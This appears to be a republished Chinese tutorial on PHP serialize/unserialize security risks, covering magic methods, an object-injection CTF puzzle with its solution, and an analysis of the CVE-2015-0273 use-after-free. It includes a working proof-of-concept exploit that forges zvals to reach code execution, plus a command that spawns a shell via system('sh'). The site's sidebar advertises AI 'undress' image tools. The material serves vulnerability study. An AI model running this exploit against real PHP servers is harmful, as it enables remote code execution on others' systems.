社区
学习
工具库
AI工具
休闲
搜索
简体中文
首页 php教程 php手册 PHP serialize && unserialize Security Risk R

PHP serialize && unserialize Security Risk R

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Jun 06, 2016 pm 07:48 PM
amp php serialize unserialize

目录 1 . 序列化的定义 2 . serialize:序列化 3 . unserialize:反序列化 4 . 序列化、反序列化存在的安全风险 5 . Use After Free Vulnerability in unserialize() with DateTime* [CVE- 2015 - 0273 ] 6 . PHP中的内存破坏漏洞利用(CVE- 2014 -8142和CVE-

目录

<span>1</span><span>. 序列化的定义
</span><span>2</span><span>. serialize:序列化
</span><span>3</span><span>. unserialize:反序列化
</span><span>4</span><span>. 序列化、反序列化存在的安全风险
</span><span>5</span>. Use After Free Vulnerability <span>in</span> unserialize() with DateTime* [CVE-<span>2015</span>-<span>0273</span><span>]
</span><span>6</span>. PHP中的内存破坏漏洞利用(CVE-<span>2014</span>-8142和CVE-<span>2015</span>-<span>0231</span>)
登录后复制

 

1. 序列化的定义

序列化在计算机科学中通常有以下定义:

<span>1</span><span>. 对同步控制而言,表示强制在同一时间内进行单一存取 
</span><span>2</span>. 在数据储存与传送的部分是指将一个对象存储至一个储存媒介,例如档案或是记亿体缓冲等,或者透过网络传送资料时进行编码的过程,可以是字节或是XML等格式。而字节的或XML编码格式可以还原完全相等的对象。这程序被应用在不同应用程序之间传送对象,以及服务器将对象储存到档案或数据库。相反的过程又称为反序列化
登录后复制

序列化有多个优点 

<span>1</span><span>. 一个简单和持久的方法使对象持续
</span><span>2</span><span>. 一个发起远程过程调用的方法,例如在SOAP内的 
</span><span>3</span>. 一个分发对象的方法,尤其是在如COM及CORBA的软件组件化内
登录后复制

Relevant Link:

http:<span>//</span><span>zh.wikipedia.org/wiki/%E5%BA%8F%E5%88%97%E5%8C%96</span>
http:<span>//</span><span>baike.baidu.com/view/160029.htm</span>
登录后复制

 

2. serialize:序列化

serialize: 产生一个可存储的值的表示
serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。这有利于存储或传递 PHP 的值,同时不丢失其类型和结构
serialize() 可处理除了 resource 之外的任何类型,包括

<span>1</span><span>. 指向其自身引用的数组
</span><span>2</span><span>. serialize() 的数组/对象中的引用也将被存储(引用本身也会被序列化)
</span><span>3</span>. ...
登录后复制

从本质上来讲,序列化的过程是一个"对象(广义上的对象,包括integer、float、string、array、object)"进行"对象销毁",然后转换为一个通用的中间可存储字符串,在整个序列化过程中,对象经历的声明周期如下

<span>1</span><span>. __sleep(): 在执行对象销毁前获得执行权限
</span><span>2</span>. __destruct():执行实际的对象销毁操作
登录后复制

code

<span>php
    </span><span>class</span><span> Connection 
    {
        </span><span>var</span><span> $protected_var;
        </span><span>var</span><span> $private_var;
        
        </span><span>public</span><span> function __construct($server, $username, $password, $db)
        {
            echo </span><span>"</span><span>function __construct() is called</span><span>"</span> . <span>"</span><span></span><span>"</span><span>;
            $</span><span>this</span>->protected_var = <span>"</span><span>protected_var</span><span>"</span><span>;
            $</span><span>this</span>->private_var = <span>"</span><span>private_var</span><span>"</span><span>;
        }
        
        function __destruct() 
        {
            echo </span><span>"</span><span>function __destruct() is called</span><span>"</span> . <span>"</span><span></span><span>"</span><span>;
           }
        
        </span><span>public</span><span> function __sleep()
        {
            echo </span><span>"</span><span>function __sleep() is called</span><span>"</span> . <span>"</span><span></span><span>"</span><span>;
        }
        
        </span><span>public</span><span> function __wakeup()
        {
            echo </span><span>"</span><span>function __wakeup() is called</span><span>"</span> . <span>"</span><span></span><span>"</span><span>;
        }
    }

    </span><span>//</span><span>initialize a var</span>
    $obj = <span>new</span><span> Connection();

    </span><span>//</span><span>var_dump($obj);</span>
<span>
    $result </span>=<span> serialize($obj);

    </span><span>//</span><span>var_dump($result);</span>
<span>
    unserialize($result);
</span>?>
登录后复制

Relevant Link:

http:<span>//</span><span>php.net/manual/zh/function.serialize.php</span>
http:<span>//</span><span>php.net/manual/zh/language.oop5.magic.php#object.wakeup</span>
http:<span>//</span><span>php.net/manual/zh/language.oop5.decon.php</span>
登录后复制

 

3. unserialize:反序列化

从已存储的表示中创建 PHP 的值
unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值

在反序列化中,经历的对象声明周期为

<span>1</span><span>. __construct():执行对象注册、包括对象中成员的注册
</span><span>2</span>. __wakeup:在构造函数执行后获得执行权限
登录后复制

Relevant Link:

http:<span>//</span><span>php.net/manual/zh/function.unserialize.php</span>
登录后复制

 

4. 序列化、反序列化存在的安全风险

0x1: 对象注入

<span>php
    #GOAL: </span><span>get</span><span> the secret;
     
    </span><span>class</span><span> just4fun 
    {
        </span><span>var</span><span> $enter;
        </span><span>var</span><span> $secret;
    }
     
    </span><span>if</span> (isset($_GET[<span>'</span><span>pass</span><span>'</span><span>])) 
    {
        $pass </span>= $_GET[<span>'</span><span>pass</span><span>'</span><span>];
     
        </span><span>if</span><span>(get_magic_quotes_gpc())
        {
        $pass</span>=<span>stripslashes($pass);
        }
     
        $o </span>=<span> unserialize($pass);
     
        </span><span>if</span><span> ($o) 
        {
        $o</span>->secret = <span>"</span><span>?????????????????????????????</span><span>"</span><span>;
        </span><span>if</span> ($o->secret === $o-><span>enter)
            echo </span><span>"</span><span>Congratulation! Here is my secret: </span><span>"</span>.$o-><span>secret;
        </span><span>else</span><span>
            echo </span><span>"</span><span>Oh no... You can't fool me</span><span>"</span><span>;
        }
        </span><span>else</span> echo <span>"</span><span>are you trolling?</span><span>"</span><span>;
    }
</span>?>
登录后复制

serialize一个just4fun的对象,序列化之前先进行引用赋值

$o->enter = &$o->secret
登录后复制

0x2: PHP Session 序列化及反序列化处理器

http:<span>//</span><span>drops.wooyun.org/tips/3909</span>
登录后复制

0x3: 基于序列化、反序列化的Webshell隐藏技巧

http:<span>//</span><span>www.cnblogs.com/LittleHann/p/3522990.html</span>
搜索:<span>0x22</span>: PHP的序列化、反序列化特性布置后门
登录后复制

Relevant Link:

http:<span>//</span><span>drops.wooyun.org/papers/660</span>
登录后复制

 

5. Use After Free Vulnerability in unserialize() with DateTime [CVE-2015-0273]

A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

0x1: Affected Versions

Affected <span>is</span> PHP <span>5.6</span> 5.6.<span>6</span><span>
Affected </span><span>is</span> PHP <span>5.5</span> 5.5.<span>22</span><span>
Affected </span><span>is</span> PHP <span>5.4</span> 5.4.<span>38</span><span>
Affected </span><span>is</span> PHP <span>5.3</span> 5.3.<span>29</span>
登录后复制

0x2: 漏洞源代码分析

\php-src-master\ext\date\php_date.c

<span>static</span> <span>int</span> php_date_initialize_from_hash(php_date_obj **dateobj, HashTable *<span>myht)
{
    zval             </span>*<span>z_date;
    zval             </span>*<span>z_timezone;
    zval             </span>*<span>z_timezone_type;
    zval              tmp_obj;
    timelib_tzinfo   </span>*<span>tzi;
    php_timezone_obj </span>*<span>tzobj;

    z_date </span>= zend_hash_str_find(myht, <span>"</span><span>date</span><span>"</span>, <span>sizeof</span>(<span>"</span><span>data</span><span>"</span>)-<span>1</span><span>);
    </span><span>if</span><span> (z_date) {
        convert_to_string(z_date);
        z_timezone_type </span>= zend_hash_str_find(myht, <span>"</span><span>timezone_type</span><span>"</span>, <span>sizeof</span>(<span>"</span><span>timezone_type</span><span>"</span>)-<span>1</span><span>);
        </span><span>if</span><span> (z_timezone_type) {
            convert_to_long(z_timezone_type);
            z_timezone </span>= zend_hash_str_find(myht, <span>"</span><span>timezone</span><span>"</span>, <span>sizeof</span>(<span>"</span><span>timezone</span><span>"</span>)-<span>1</span><span>);
            </span><span>if</span><span> (z_timezone) {
                convert_to_string(z_timezone);

...</span>
登录后复制

The convert_to_long() leads to the ZVAL and all its children is freed from memory. However the unserialize() code will still allow to use R: or r: to set references to that already freed memory. There is a use after free vulnerability, and allows to execute arbitrary code.

0x3: poc

<span>php

$f </span>= $argv[<span>1</span><span>];
$c </span>= $argv[<span>2</span><span>];

$fakezval1 </span>= ptr2str(<span>0x100b83008</span><span>);
$fakezval1 .</span>= ptr2str(<span>0x8</span><span>);
$fakezval1 .</span>= <span>"</span><span>\x00\x00\x00\x00</span><span>"</span><span>;
$fakezval1 .</span>= <span>"</span><span>\x06</span><span>"</span><span>;
$fakezval1 .</span>= <span>"</span><span>\x00</span><span>"</span><span>;
$fakezval1 .</span>= <span>"</span><span>\x00\x00</span><span>"</span><span>;

$data1 </span>= <span>'</span><span>a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:</span><span>'</span>.strlen($fakezval1).<span>'</span><span>:"</span><span>'</span>.$fakezval1.<span>'</span><span>";i:2;a:1:{i:0;R:4;}}</span><span>'</span><span>;

$x </span>=<span> unserialize($data1);
$y </span>= $x[<span>2</span><span>];

</span><span>//</span><span> zend_eval_string()'s address</span>
$y[<span>0</span>][<span>0</span>] = <span>"</span><span>\x6d</span><span>"</span><span>;
$y[</span><span>0</span>][<span>1</span>] = <span>"</span><span>\x1e</span><span>"</span><span>;
$y[</span><span>0</span>][<span>2</span>] = <span>"</span><span>\x35</span><span>"</span><span>;
$y[</span><span>0</span>][<span>3</span>] = <span>"</span><span>\x00</span><span>"</span><span>;
$y[</span><span>0</span>][<span>4</span>] = <span>"</span><span>\x01</span><span>"</span><span>;
$y[</span><span>0</span>][<span>5</span>] = <span>"</span><span>\x00</span><span>"</span><span>;
$y[</span><span>0</span>][<span>6</span>] = <span>"</span><span>\x00</span><span>"</span><span>;
$y[</span><span>0</span>][<span>7</span>] = <span>"</span><span>\x00</span><span>"</span><span>;

$fakezval2 </span>= ptr2str(<span>0x3b296324286624</span>); <span>//</span><span> $f($c);</span>
$fakezval2 .= ptr2str(<span>0x100b83000</span><span>);
$fakezval2 .</span>= <span>"</span><span>\x00\x00\x00\x00</span><span>"</span><span>;
$fakezval2 .</span>= <span>"</span><span>\x05</span><span>"</span><span>;
$fakezval2 .</span>= <span>"</span><span>\x00</span><span>"</span><span>;
$fakezval2 .</span>= <span>"</span><span>\x00\x00</span><span>"</span><span>;

$data2 </span>= <span>'</span><span>a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:</span><span>'</span>.strlen($fakezval2).<span>'</span><span>:"</span><span>'</span>.$fakezval2.<span>'</span><span>";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}</span><span>'</span><span>;

$z </span>=<span> unserialize($data2);

function ptr2str($ptr)
{
    $</span><span>out</span> = <span>""</span><span>;
    </span><span>for</span> ($i=<span>0</span>; $i8; $i++<span>) {
        $</span><span>out</span> .= chr($ptr & <span>0xff</span><span>);
        $ptr </span>>>= <span>8</span><span>;
    }
    </span><span>return</span> $<span>out</span><span>;
}

</span>?>
登录后复制

gdb php
run uafpoc.php assert "system\('sh'\)==exit\(\)"

Relevant Link:

https:<span>//</span><span>github.com/80vul/phpcodz/tree/master/research</span>
登录后复制

 

6. PHP中的内存破坏漏洞利用(CVE-2014-8142和CVE-2015-0231)

待研究

Relevant Link:

http:<span>//</span><span>drops.wooyun.org/papers/4864</span>
登录后复制

 

Copyright (c) 2014 LittleHann All rights reserved

 

本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

热AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智能驱动的应用程序,用于创建逼真的裸体照片

AI Clothes Remover

AI Clothes Remover

用于从照片中去除衣服的在线人工智能工具。

Undress AI Tool

Undress AI Tool

免费脱衣服图片

Clothoff.io

Clothoff.io

AI脱衣机

AI Hentai Generator

AI Hentai Generator

免费生成ai无尽的。

显示更多

热门文章

R.E.P.O.能量晶体解释及其做什么(黄色晶体)
2 周前 By 尊渡假赌尊渡假赌尊渡假赌
击败分裂小说需要多长时间?
4 周前 By DDD
R.E.P.O.保存文件位置:在哪里以及如何保护它?
1 个月前 By DDD
R.E.P.O.最佳图形设置
2 周前 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.如果您听不到任何人,如何修复音频
2 周前 By 尊渡假赌尊渡假赌尊渡假赌
显示更多

热工具

记事本++7.3.1

记事本++7.3.1

好用且免费的代码编辑器

SublimeText3汉化版

SublimeText3汉化版

中文版,非常好用

禅工作室 13.0.1

禅工作室 13.0.1

功能强大的PHP集成开发环境

Dreamweaver CS6

Dreamweaver CS6

视觉化网页开发工具

SublimeText3 Mac版

SublimeText3 Mac版

神级代码编辑软件(SublimeText3)

显示更多

热门话题

gmail邮箱登陆入口在哪里
7385
15
Java教程
1629
14
CakePHP 教程
1357
52
Laravel 教程
1267
25
PHP教程
1216
29
显示更多
Related knowledge
CakePHP 项目配置 CakePHP 项目配置 Sep 10, 2024 pm 05:25 PM

在本章中,我们将了解CakePHP中的环境变量、常规配置、数据库配置和电子邮件配置。

适用于 Ubuntu 和 Debian 的 PHP 8.4 安装和升级指南 适用于 Ubuntu 和 Debian 的 PHP 8.4 安装和升级指南 Dec 24, 2024 pm 04:42 PM

PHP 8.4 带来了多项新功能、安全性改进和性能改进,同时弃用和删除了大量功能。 本指南介绍了如何在 Ubuntu、Debian 或其衍生版本上安装 PHP 8.4 或升级到 PHP 8.4

CakePHP 日期和时间 CakePHP 日期和时间 Sep 10, 2024 pm 05:27 PM

为了在 cakephp4 中处理日期和时间,我们将使用可用的 FrozenTime 类。

CakePHP 文件上传 CakePHP 文件上传 Sep 10, 2024 pm 05:27 PM

为了进行文件上传,我们将使用表单助手。这是文件上传的示例。

CakePHP 路由 CakePHP 路由 Sep 10, 2024 pm 05:25 PM

在本章中,我们将学习以下与路由相关的主题?

讨论 CakePHP 讨论 CakePHP Sep 10, 2024 pm 05:28 PM

CakePHP 是 PHP 的开源框架。它的目的是使应用程序的开发、部署和维护变得更加容易。 CakePHP 基于类似 MVC 的架构,功能强大且易于掌握。模型、视图和控制器 gu

CakePHP 创建验证器 CakePHP 创建验证器 Sep 10, 2024 pm 05:26 PM

可以通过在控制器中添加以下两行来创建验证器。

CakePHP 使用数据库 CakePHP 使用数据库 Sep 10, 2024 pm 05:25 PM

在 CakePHP 中使用数据库非常容易。本章我们将了解CRUD(创建、读取、更新、删除)操作。

See all articles